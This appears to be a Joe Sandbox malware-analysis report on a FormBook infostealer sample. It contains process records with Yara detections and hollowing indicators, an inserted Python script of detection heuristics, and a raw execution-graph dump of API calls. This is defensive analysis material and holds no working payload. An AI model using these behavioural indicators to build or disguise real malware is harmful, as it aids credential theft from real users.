                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:03:14:26
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\TCPSVCS.EXE"
                                                                Imagebase:0xde0000
                                                                File size:10'752 bytes
                                                                MD5 hash:73905DB831B4F37F0673D2DD5BBF7779
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:6
                                                                Start time:03:14:42
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe"
                                                                Imagebase:0xb90000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:03:14:54
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff722870000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true
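Two things in the process records above are worth checking mechanically rather than by eye: Target 2 runs the image C:\Windows\SysWOW64\svchost.exe but carries the sample's own command line, which is what a replaced (hollowed) process looks like in a process listing, and Targets 4 and 6 run from a letters-only directory name under Program Files (x86). The script below is an added example, not part of the Joe Sandbox report: PROCESSES is transcribed from the Target ID blocks above, and the directory-name rule and its length threshold are the example's own constructed heuristic.

```python
"""Consistency checks over the process records listed above.

Added example, not part of the Joe Sandbox report. PROCESSES is transcribed
from the report's Target ID blocks; the checks are illustrative heuristics,
and the letters-only directory rule uses a constructed threshold.
"""
import ntpath
import re

# Transcribed from the report (Target IDs 0, 2, 4, 5, 6, 8). "yara" is the
# number of FormBook Yara matches the report lists for that process.
PROCESSES = [
    {"target": 0, "path": r"C:\Users\user\Desktop\xaqnaB0rcW.exe",
     "cmdline": r'"C:\Users\user\Desktop\xaqnaB0rcW.exe"', "wow64": True, "yara": 0},
    {"target": 2, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\xaqnaB0rcW.exe"', "wow64": True, "yara": 3},
    {"target": 4, "path": r"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe",
     "cmdline": r'"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe"',
     "wow64": True, "yara": 1},
    {"target": 5, "path": r"C:\Windows\SysWOW64\TCPSVCS.EXE",
     "cmdline": r'"C:\Windows\SysWOW64\TCPSVCS.EXE"', "wow64": True, "yara": 3},
    {"target": 6, "path": r"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe",
     "cmdline": r'"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe"',
     "wow64": True, "yara": 1},
    {"target": 8, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "wow64": False, "yara": 0},
]

# Constructed threshold: a parent directory made only of letters, 16 or more of them.
RANDOM_DIR = re.compile(r"[A-Za-z]{16,}")


def image_from_cmdline(cmdline):
    """First token of a Windows command line: a quoted path, or text up to the first space."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def process_indicators(proc):
    """Names of the illustrative checks a process record trips, in fixed order."""
    hits = []
    # The command line names a different image than the one actually mapped.
    # ntpath.normcase lowercases and normalises separators on any host OS, so
    # Firefox.exe vs firefox.exe (Target 8) does not trip this check.
    if ntpath.normcase(image_from_cmdline(proc["cmdline"])) != ntpath.normcase(proc["path"]):
        hits.append("commandline_image_mismatch")
    # Letters-only directory directly under Program Files / Program Files (x86).
    parent = ntpath.basename(ntpath.dirname(proc["path"]))
    under_program_files = ntpath.normcase(proc["path"]).startswith(ntpath.normcase(r"C:\Program Files"))
    if under_program_files and RANDOM_DIR.fullmatch(parent):
        hits.append("random_program_files_dir")
    if proc["yara"] > 0:
        hits.append("yara_formbook_match")
    return hits


def triage(processes):
    """Map each Target ID to the indicators its record trips."""
    return {p["target"]: process_indicators(p) for p in processes}


if __name__ == "__main__":
    for target, hits in triage(PROCESSES).items():
        print(target, hits or "-")
```

The same two checks transfer directly to an EDR or Sysmon process-creation feed: compare the image path against the first token of the command line, and flag long vowel-free directory names under Program Files before trusting a binary because of where it lives.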


                                                                  Execution Graph

                                                                  Execution Coverage:3.6%
                                                                  Dynamic/Decrypted Code Coverage:1.8%
                                                                  Signature Coverage:4.7%
                                                                  Total number of Nodes:1871
                                                                  Total number of Limit Nodes:149
[Execution graph: the interactive node and edge listing is not reproduced. Node addresses in the 0x35xxxx to 0x3cxxxx range lie in the image loaded at 0x350000 (Target 0); the API-call nodes named in the graph are:
• Runtime, loader and CRT: 0x37399b RtlAllocateHeap; 0x376805 RaiseException; 0x371145 GetModuleHandleExW, GetProcAddress, ExitProcess; 0x3afbee GetCurrentProcess, TerminateProcess; 0x36dea4 GetCurrentProcess; 0x36edc5 VirtualProtect; 0x3afd7e, 0x36df1c and 0x36df09 FreeLibrary; 0x36df5f, 0x36df92 and 0x36e027 LoadLibraryA with 0x36dfa3 and 0x36e038 GetProcAddress; 0x3897ed InterlockedDecrement; 0x3b0582 CharLowerBuffW
• Environment, version and registry reads: 0x355381 GetModuleFileNameW; 0x35366c and 0x35661c GetFullPathNameW; 0x36ddd7 GetVersionExW; 0x36df31 and 0x36df29 GetSystemInfo; 0x36df01 GetNativeSystemInfo; 0x354a0a RegOpenKeyExW, 0x3c41cc and 0x3547c9 RegQueryValueExW, 0x3c4246 RegCloseKey; 0x36d2ac RegOpenKeyExW, 0x36d2c6 RegQueryValueExW, 0x36d2fc RegCloseKey
• Window and tray-icon handling, consistent with a compiled AutoIt runtime: 0x3537ab DefWindowProcW; 0x35382c PostQuitMessage; 0x3537f6 SetTimer, RegisterWindowMessageW; 0x35381f CreatePopupMenu; 0x3537da KillTimer; 0x353847, 0x3c3d28, 0x3550ca and 0x355288 Shell_NotifyIconW; 0x3c1dcb SetFocus; 0x3c1ddc MoveWindow; 0x35390f DeleteObject, DestroyWindow; 0x3c3c3c DestroyIcon; 0x3c3ca1 LoadStringW
• Code outside the mapped image (0xfd6b38 to 0xfd9fe2): 0xfd9fb8 GetPEB; 0xfd8de1 Sleep; then the chain from 0xfd8ee8 through 0xfd8fb8 CreateFileW, 0xfd9023 VirtualAlloc, 0xfd9041 ReadFile and 0xfd7dd8 (13 API calls) to 0xfd90b2 ExitProcess, i.e. a file is opened, a buffer is allocated and the file contents are read into it before the process exits]
356b4a 48 API calls 93869->93870 93871 3551d9 93870->93871 93871->93849 93871->93850 93872 3c19cb 93877 352322 93872->93877 93874 3c19d1 93910 370f0a 52 API calls __cinit 93874->93910 93876 3c19db 93878 352344 93877->93878 93911 3526df 93878->93911 93883 35d7f7 48 API calls 93884 352384 93883->93884 93885 35d7f7 48 API calls 93884->93885 93886 35238e 93885->93886 93887 35d7f7 48 API calls 93886->93887 93888 352398 93887->93888 93889 35d7f7 48 API calls 93888->93889 93890 3523de 93889->93890 93891 35d7f7 48 API calls 93890->93891 93892 3524c1 93891->93892 93919 35263f 93892->93919 93896 3524f1 93897 35d7f7 48 API calls 93896->93897 93898 3524fb 93897->93898 93948 352745 93898->93948 93900 352546 93901 352556 GetStdHandle 93900->93901 93902 3c501d 93901->93902 93903 3525b1 93901->93903 93902->93903 93905 3c5026 93902->93905 93904 3525b7 CoInitialize 93903->93904 93904->93874 93955 3992d4 53 API calls 93905->93955 93907 3c502d 93956 3999f9 CreateThread 93907->93956 93909 3c5039 CloseHandle 93909->93904 93910->93876 93957 352854 93911->93957 93914 356a63 48 API calls 93915 35234a 93914->93915 93916 35272e 93915->93916 93971 3527ec 6 API calls 93916->93971 93918 35237a 93918->93883 93920 35d7f7 48 API calls 93919->93920 93921 35264f 93920->93921 93922 35d7f7 48 API calls 93921->93922 93923 352657 93922->93923 93972 3526a7 93923->93972 93926 3526a7 48 API calls 93927 352667 93926->93927 93928 35d7f7 48 API calls 93927->93928 93929 352672 93928->93929 93930 36f4ea 48 API calls 93929->93930 93931 3524cb 93930->93931 93932 3522a4 93931->93932 93933 3522b2 93932->93933 93934 35d7f7 48 API calls 93933->93934 93935 3522bd 93934->93935 93936 35d7f7 48 API calls 93935->93936 93937 3522c8 93936->93937 93938 35d7f7 48 API calls 93937->93938 93939 3522d3 93938->93939 93940 35d7f7 48 API calls 93939->93940 93941 3522de 93940->93941 93942 3526a7 48 API calls 93941->93942 93943 3522e9 93942->93943 93944 36f4ea 48 API calls 93943->93944 93945 3522f0 93944->93945 93946 3c1fe7 
93945->93946 93947 3522f9 RegisterWindowMessageW 93945->93947 93947->93896 93949 352755 93948->93949 93950 3c5f4d 93948->93950 93951 36f4ea 48 API calls 93949->93951 93977 39c942 50 API calls 93950->93977 93953 35275d 93951->93953 93953->93900 93954 3c5f58 93955->93907 93956->93909 93978 3999df 54 API calls 93956->93978 93964 352870 93957->93964 93960 352870 48 API calls 93961 352864 93960->93961 93962 35d7f7 48 API calls 93961->93962 93963 352716 93962->93963 93963->93914 93965 35d7f7 48 API calls 93964->93965 93966 35287b 93965->93966 93967 35d7f7 48 API calls 93966->93967 93968 352883 93967->93968 93969 35d7f7 48 API calls 93968->93969 93970 35285c 93969->93970 93970->93960 93971->93918 93973 35d7f7 48 API calls 93972->93973 93974 3526b0 93973->93974 93975 35d7f7 48 API calls 93974->93975 93976 35265f 93975->93976 93976->93926 93977->93954 93979 375dfd 93980 375e09 _fseek 93979->93980 94016 377eeb GetStartupInfoW 93980->94016 93983 375e0e 94018 379ca7 GetProcessHeap 93983->94018 93984 375e66 93985 375e71 93984->93985 94103 375f4d 47 API calls 3 library calls 93984->94103 94019 377b47 93985->94019 93988 375e77 93989 375e82 __RTC_Initialize 93988->93989 94104 375f4d 47 API calls 3 library calls 93988->94104 94040 37acb3 93989->94040 93992 375e91 93993 375e9d GetCommandLineW 93992->93993 94105 375f4d 47 API calls 3 library calls 93992->94105 94059 382e7d GetEnvironmentStringsW 93993->94059 93996 375e9c 93996->93993 94000 375ec2 94072 382cb4 94000->94072 94003 375ec8 94004 375ed3 94003->94004 94107 37115b 47 API calls 3 library calls 94003->94107 94086 371195 94004->94086 94007 375edb 94009 375ee6 __wwincmdln 94007->94009 94108 37115b 47 API calls 3 library calls 94007->94108 94090 353a0f 94009->94090 94011 375efa 94012 375f09 94011->94012 94109 3713f1 47 API calls _doexit 94011->94109 94110 371186 47 API calls _doexit 94012->94110 94015 375f0e _fseek 94017 377f01 94016->94017 94017->93983 94018->93984 94111 37123a 30 API calls 2 library calls 94019->94111 94021 
377b4c 94112 377e23 InitializeCriticalSectionAndSpinCount 94021->94112 94023 377b51 94024 377b55 94023->94024 94114 377e6d TlsAlloc 94023->94114 94113 377bbd 50 API calls 2 library calls 94024->94113 94027 377b5a 94027->93988 94028 377b67 94028->94024 94029 377b72 94028->94029 94115 376986 94029->94115 94032 377bb4 94123 377bbd 50 API calls 2 library calls 94032->94123 94035 377bb9 94035->93988 94036 377b93 94036->94032 94037 377b99 94036->94037 94122 377a94 47 API calls 4 library calls 94037->94122 94039 377ba1 GetCurrentThreadId 94039->93988 94041 37acbf _fseek 94040->94041 94132 377cf4 94041->94132 94043 37acc6 94044 376986 __calloc_crt 47 API calls 94043->94044 94046 37acd7 94044->94046 94045 37ad42 GetStartupInfoW 94054 37ae80 94045->94054 94056 37ad57 94045->94056 94046->94045 94047 37ace2 _fseek @_EH4_CallFilterFunc@8 94046->94047 94047->93992 94048 37af44 94139 37af58 LeaveCriticalSection _doexit 94048->94139 94050 37aec9 GetStdHandle 94050->94054 94051 376986 __calloc_crt 47 API calls 94051->94056 94052 37aedb GetFileType 94052->94054 94053 37ada5 94053->94054 94057 37add7 GetFileType 94053->94057 94058 37ade5 InitializeCriticalSectionAndSpinCount 94053->94058 94054->94048 94054->94050 94054->94052 94055 37af08 InitializeCriticalSectionAndSpinCount 94054->94055 94055->94054 94056->94051 94056->94053 94056->94054 94057->94053 94057->94058 94058->94053 94060 382e8e 94059->94060 94061 375ead 94059->94061 94178 3769d0 47 API calls __crtGetStringTypeA_stat 94060->94178 94066 382a7b GetModuleFileNameW 94061->94066 94064 382eb4 ___crtGetEnvironmentStringsW 94065 382eca FreeEnvironmentStringsW 94064->94065 94065->94061 94067 382aaf _wparse_cmdline 94066->94067 94068 375eb7 94067->94068 94069 382ae9 94067->94069 94068->94000 94106 37115b 47 API calls 3 library calls 94068->94106 94179 3769d0 47 API calls __crtGetStringTypeA_stat 94069->94179 94071 382aef _wparse_cmdline 94071->94068 94073 382ccd __wsetenvp 94072->94073 94077 382cc5 94072->94077 94074 376986 
__calloc_crt 47 API calls 94073->94074 94082 382cf6 __wsetenvp 94074->94082 94075 382d4d 94076 371c9d _free 47 API calls 94075->94076 94076->94077 94077->94003 94078 376986 __calloc_crt 47 API calls 94078->94082 94079 382d72 94080 371c9d _free 47 API calls 94079->94080 94080->94077 94082->94075 94082->94077 94082->94078 94082->94079 94083 382d89 94082->94083 94180 382567 47 API calls _fseek 94082->94180 94181 376e20 IsProcessorFeaturePresent 94083->94181 94085 382d95 94085->94003 94087 3711a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94086->94087 94089 3711e0 __IsNonwritableInCurrentImage 94087->94089 94204 370f0a 52 API calls __cinit 94087->94204 94089->94007 94091 3c1ebf 94090->94091 94092 353a29 94090->94092 94093 353a63 IsThemeActive 94092->94093 94205 371405 94093->94205 94097 353a8f 94217 353adb SystemParametersInfoW SystemParametersInfoW 94097->94217 94099 353a9b 94218 353d19 94099->94218 94101 353aa3 SystemParametersInfoW 94102 353ac8 94101->94102 94102->94011 94103->93985 94104->93989 94105->93996 94109->94012 94110->94015 94111->94021 94112->94023 94113->94027 94114->94028 94117 37698d 94115->94117 94118 3769ca 94117->94118 94119 3769ab Sleep 94117->94119 94124 3830aa 94117->94124 94118->94032 94121 377ec9 TlsSetValue 94118->94121 94120 3769c2 94119->94120 94120->94117 94120->94118 94121->94036 94122->94039 94123->94035 94125 3830b5 94124->94125 94129 3830d0 __calloc_impl 94124->94129 94126 3830c1 94125->94126 94125->94129 94131 377c0e 47 API calls __getptd_noexit 94126->94131 94128 3830e0 HeapAlloc 94128->94129 94130 3830c6 94128->94130 94129->94128 94129->94130 94130->94117 94131->94130 94133 377d05 94132->94133 94134 377d18 EnterCriticalSection 94132->94134 94140 377d7c 94133->94140 94134->94043 94136 377d0b 94136->94134 94164 37115b 47 API calls 3 library calls 94136->94164 94139->94047 94141 377d88 _fseek 94140->94141 94142 377d91 94141->94142 94143 377da9 94141->94143 94165 3781c2 47 API calls 2 library calls 94142->94165 
94147 377e11 _fseek 94143->94147 94158 377da7 94143->94158 94146 377d96 94166 37821f 47 API calls 8 library calls 94146->94166 94147->94136 94148 377dbd 94150 377dc4 94148->94150 94151 377dd3 94148->94151 94169 377c0e 47 API calls __getptd_noexit 94150->94169 94154 377cf4 __lock 46 API calls 94151->94154 94152 377d9d 94167 371145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94152->94167 94157 377dda 94154->94157 94156 377dc9 94156->94147 94159 377dfe 94157->94159 94160 377de9 InitializeCriticalSectionAndSpinCount 94157->94160 94158->94143 94168 3769d0 47 API calls __crtGetStringTypeA_stat 94158->94168 94170 371c9d 94159->94170 94161 377e04 94160->94161 94176 377e1a LeaveCriticalSection _doexit 94161->94176 94165->94146 94166->94152 94168->94148 94169->94156 94171 371ca6 RtlFreeHeap 94170->94171 94175 371ccf __dosmaperr 94170->94175 94172 371cbb 94171->94172 94171->94175 94177 377c0e 47 API calls __getptd_noexit 94172->94177 94174 371cc1 GetLastError 94174->94175 94175->94161 94176->94147 94177->94174 94178->94064 94179->94071 94180->94082 94182 376e2b 94181->94182 94187 376cb5 94182->94187 94186 376e46 94186->94085 94188 376ccf _memset ___raise_securityfailure 94187->94188 94189 376cef IsDebuggerPresent 94188->94189 94195 3781ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94189->94195 94192 376dd6 94194 378197 GetCurrentProcess TerminateProcess 94192->94194 94193 376db3 ___raise_securityfailure 94196 37a70c 94193->94196 94194->94186 94195->94193 94197 37a716 IsProcessorFeaturePresent 94196->94197 94198 37a714 94196->94198 94200 3837b0 94197->94200 94198->94192 94203 38375f 5 API calls ___raise_securityfailure 94200->94203 94202 383893 94202->94192 94203->94202 94204->94089 94206 377cf4 __lock 47 API calls 94205->94206 94207 371410 94206->94207 94270 377e58 LeaveCriticalSection 94207->94270 94209 353a88 94210 37146d 94209->94210 94211 371477 94210->94211 94212 371491 94210->94212 94211->94212 94271 377c0e 47 API calls __getptd_noexit 
94211->94271 94212->94097 94214 371481 94272 376e10 8 API calls _fseek 94214->94272 94216 37148c 94216->94097 94217->94099 94219 353d26 __ftell_nolock 94218->94219 94220 35d7f7 48 API calls 94219->94220 94221 353d31 GetCurrentDirectoryW 94220->94221 94273 3561ca 94221->94273 94223 353d57 IsDebuggerPresent 94224 353d65 94223->94224 94225 3c1cc1 MessageBoxA 94223->94225 94227 3c1cd9 94224->94227 94228 353d82 94224->94228 94256 353e3a 94224->94256 94225->94227 94226 353e41 SetCurrentDirectoryW 94229 353e4e Mailbox 94226->94229 94449 36c682 48 API calls 94227->94449 94347 3540e5 94228->94347 94229->94101 94233 3c1ce9 94237 3c1cff SetCurrentDirectoryW 94233->94237 94234 353da0 GetFullPathNameW 94235 356a63 48 API calls 94234->94235 94236 353ddb 94235->94236 94363 356430 94236->94363 94237->94229 94240 353df6 94241 353e00 94240->94241 94450 3971fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94240->94450 94379 353e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94241->94379 94244 3c1d1c 94244->94241 94247 3c1d2d 94244->94247 94249 355374 50 API calls 94247->94249 94248 353e0a 94250 353e1f 94248->94250 94252 354ffc 67 API calls 94248->94252 94251 3c1d35 94249->94251 94387 35e8d0 94250->94387 94255 35ce19 48 API calls 94251->94255 94252->94250 94257 3c1d42 94255->94257 94256->94226 94259 3c1d6e 94257->94259 94260 3c1d49 94257->94260 94261 35518c 48 API calls 94259->94261 94262 35518c 48 API calls 94260->94262 94269 3c1d6a GetForegroundWindow ShellExecuteW 94261->94269 94263 3c1d54 94262->94263 94264 35510d 48 API calls 94263->94264 94266 3c1d61 94264->94266 94268 35518c 48 API calls 94266->94268 94267 3c1d9e Mailbox 94267->94256 94268->94269 94269->94267 94270->94209 94271->94214 94272->94216 94451 36e99b 94273->94451 94277 3561eb 94278 355374 50 API calls 94277->94278 94279 3561ff 94278->94279 94280 35ce19 48 API calls 94279->94280 94281 35620c 94280->94281 94468 3539db 94281->94468 94283 356216 Mailbox 94284 356eed 48 API calls 94283->94284 94285 
35622b 94284->94285 94480 359048 94285->94480 94288 35ce19 48 API calls 94289 356244 94288->94289 94483 35d6e9 94289->94483 94291 356254 Mailbox 94292 35ce19 48 API calls 94291->94292 94293 35627c 94292->94293 94294 35d6e9 55 API calls 94293->94294 94295 35628f Mailbox 94294->94295 94296 35ce19 48 API calls 94295->94296 94297 3562a0 94296->94297 94487 35d645 94297->94487 94299 3562b2 Mailbox 94300 35d7f7 48 API calls 94299->94300 94301 3562c5 94300->94301 94497 3563fc 94301->94497 94305 3562df 94306 3c1c08 94305->94306 94307 3562e9 94305->94307 94308 3563fc 48 API calls 94306->94308 94309 370fa7 _W_store_winword 59 API calls 94307->94309 94310 3c1c1c 94308->94310 94311 3562f4 94309->94311 94314 3563fc 48 API calls 94310->94314 94311->94310 94312 3562fe 94311->94312 94313 370fa7 _W_store_winword 59 API calls 94312->94313 94315 356309 94313->94315 94316 3c1c38 94314->94316 94315->94316 94317 356313 94315->94317 94319 355374 50 API calls 94316->94319 94318 370fa7 _W_store_winword 59 API calls 94317->94318 94320 35631e 94318->94320 94321 3c1c5d 94319->94321 94322 35635f 94320->94322 94325 3c1c86 94320->94325 94328 3563fc 48 API calls 94320->94328 94323 3563fc 48 API calls 94321->94323 94322->94325 94326 35636c 94322->94326 94324 3c1c69 94323->94324 94327 356eed 48 API calls 94324->94327 94329 356eed 48 API calls 94325->94329 94333 36c050 48 API calls 94326->94333 94330 3c1c77 94327->94330 94331 356342 94328->94331 94332 3c1ca8 94329->94332 94335 3563fc 48 API calls 94330->94335 94336 356eed 48 API calls 94331->94336 94337 3563fc 48 API calls 94332->94337 94334 356384 94333->94334 94338 361b90 48 API calls 94334->94338 94335->94325 94339 356350 94336->94339 94340 3c1cb5 94337->94340 94341 356394 94338->94341 94342 3563fc 48 API calls 94339->94342 94340->94340 94343 361b90 48 API calls 94341->94343 94345 3563d6 Mailbox 94341->94345 94346 3563fc 48 API calls 94341->94346 94513 356b68 48 API calls 94341->94513 94342->94322 94343->94341 94345->94223 94346->94341 94348 
3540f2 __ftell_nolock 94347->94348 94349 3c370e _memset 94348->94349 94350 35410b 94348->94350 94352 3c372a GetOpenFileNameW 94349->94352 94351 35660f 49 API calls 94350->94351 94353 354114 94351->94353 94354 3c3779 94352->94354 94991 3540a7 94353->94991 94356 356a63 48 API calls 94354->94356 94358 3c378e 94356->94358 94358->94358 94360 354129 95009 354139 94360->95009 94364 35643d __ftell_nolock 94363->94364 95224 354c75 94364->95224 94366 356442 94378 353dee 94366->94378 95235 355928 86 API calls 94366->95235 94368 35644f 94368->94378 95236 355798 88 API calls Mailbox 94368->95236 94370 356458 94371 35645c GetFullPathNameW 94370->94371 94370->94378 94372 356a63 48 API calls 94371->94372 94373 356488 94372->94373 94374 356a63 48 API calls 94373->94374 94375 356495 94374->94375 94376 3c5dcf _wcscat 94375->94376 94377 356a63 48 API calls 94375->94377 94377->94378 94378->94233 94378->94240 94380 3c1cba 94379->94380 94381 353ed8 94379->94381 95273 354024 94381->95273 94385 353e05 94386 3536b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94385->94386 94386->94248 94388 35e8eb 94387->94388 94390 35ed52 94388->94390 94411 35e906 Mailbox 94388->94411 94389 39cc5c 86 API calls 94389->94411 95365 36e3cd 335 API calls 94390->95365 94391 35ebc7 94393 353e2a 94391->94393 95366 352ff6 16 API calls 94391->95366 94393->94256 94448 353847 Shell_NotifyIconW _memset 94393->94448 94395 35ed63 94395->94393 94396 35ed70 94395->94396 95367 36e312 335 API calls Mailbox 94396->95367 94397 35e94c PeekMessageW 94397->94411 94399 3c526e Sleep 94399->94411 94400 35ed77 LockWindowUpdate DestroyWindow GetMessageW 94400->94393 94402 35eda9 94400->94402 94403 3c59ef TranslateMessage DispatchMessageW GetMessageW 94402->94403 94403->94403 94405 3c5a1f 94403->94405 94405->94393 94406 35ed21 PeekMessageW 94406->94411 94407 351caa 49 API calls 94407->94411 94408 35ebf7 timeGetTime 94408->94411 94410 356eed 48 API calls 94410->94411 94411->94389 94411->94391 94411->94397 94411->94399 
94411->94406 94411->94407 94411->94408 94411->94410 94412 35ed3a TranslateMessage DispatchMessageW 94411->94412 94413 3c5557 WaitForSingleObject 94411->94413 94414 36f4ea 48 API calls 94411->94414 94417 3c588f Sleep 94411->94417 94418 3c5429 Mailbox 94411->94418 94419 35edae timeGetTime 94411->94419 94420 3c5733 Sleep 94411->94420 94426 352aae 311 API calls 94411->94426 94428 3c5445 Sleep 94411->94428 94440 35fe30 311 API calls 94411->94440 94446 35ce19 48 API calls 94411->94446 94447 35d6e9 55 API calls 94411->94447 95278 35f110 94411->95278 95343 3645e0 94411->95343 95360 35eed0 335 API calls Mailbox 94411->95360 95361 35ef00 86 API calls 94411->95361 95362 363200 335 API calls 2 library calls 94411->95362 95363 36e244 TranslateAcceleratorW 94411->95363 95364 36dc5f IsDialogMessageW GetClassLongW 94411->95364 95369 3b8d23 48 API calls 94411->95369 94412->94406 94413->94411 94415 3c5574 GetExitCodeProcess CloseHandle 94413->94415 94414->94411 94415->94411 94416 35d7f7 48 API calls 94416->94418 94417->94418 94418->94411 94418->94416 94424 3c5926 GetExitCodeProcess 94418->94424 94427 36dc38 timeGetTime 94418->94427 94418->94428 94431 3c5432 Sleep 94418->94431 94432 3b8c4b 108 API calls 94418->94432 94433 352c79 107 API calls 94418->94433 94435 3c59ae Sleep 94418->94435 94437 35ce19 48 API calls 94418->94437 94441 35d6e9 55 API calls 94418->94441 95370 394cbe 49 API calls Mailbox 94418->95370 95371 351caa 49 API calls 94418->95371 95372 352aae 335 API calls 94418->95372 95373 3accb2 50 API calls 94418->95373 95374 397a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94418->95374 95375 396532 63 API calls 3 library calls 94418->95375 95368 351caa 49 API calls 94419->95368 94420->94418 94429 3c593c WaitForSingleObject 94424->94429 94430 3c5952 CloseHandle 94424->94430 94426->94411 94427->94418 94428->94411 94429->94411 94429->94430 94430->94418 94431->94428 94432->94418 94433->94418 94435->94411 94437->94418 94440->94411 
94441->94418 94446->94411 94447->94411 94448->94256 94449->94233 94450->94244 94452 35d7f7 48 API calls 94451->94452 94453 3561db 94452->94453 94454 356009 94453->94454 94455 356016 __ftell_nolock 94454->94455 94456 356a63 48 API calls 94455->94456 94460 35617c Mailbox 94455->94460 94458 356048 94456->94458 94467 35607e Mailbox 94458->94467 94514 3561a6 94458->94514 94459 3561a6 48 API calls 94459->94467 94460->94277 94461 35614f 94461->94460 94462 35ce19 48 API calls 94461->94462 94464 356170 94462->94464 94463 35ce19 48 API calls 94463->94467 94465 3564cf 48 API calls 94464->94465 94465->94460 94466 3564cf 48 API calls 94466->94467 94467->94459 94467->94460 94467->94461 94467->94463 94467->94466 94517 3541a9 94468->94517 94471 353a06 94471->94283 94474 3c2ff0 94476 371c9d _free 47 API calls 94474->94476 94477 3c2ffd 94476->94477 94478 354252 84 API calls 94477->94478 94479 3c3006 94478->94479 94479->94479 94481 36f4ea 48 API calls 94480->94481 94482 356237 94481->94482 94482->94288 94484 35d6f4 94483->94484 94486 35d71b 94484->94486 94984 35d764 55 API calls 94484->94984 94486->94291 94488 35d654 94487->94488 94496 35d67e 94487->94496 94489 35d65b 94488->94489 94492 35d6c2 94488->94492 94490 35d6ab 94489->94490 94491 35d666 94489->94491 94490->94496 94986 36dce0 53 API calls 94490->94986 94985 35d9a0 53 API calls __cinit 94491->94985 94492->94490 94987 36dce0 53 API calls 94492->94987 94496->94299 94498 356406 94497->94498 94499 35641f 94497->94499 94500 356eed 48 API calls 94498->94500 94501 356a63 48 API calls 94499->94501 94502 3562d1 94500->94502 94501->94502 94503 370fa7 94502->94503 94504 370fb3 94503->94504 94505 371028 94503->94505 94512 370fd8 94504->94512 94988 377c0e 47 API calls __getptd_noexit 94504->94988 94990 37103a 59 API calls 3 library calls 94505->94990 94508 371035 94508->94305 94509 370fbf 94989 376e10 8 API calls _fseek 94509->94989 94511 370fca 94511->94305 94512->94305 94513->94341 94515 35bdfa 48 API calls 94514->94515 94516 3561b1 
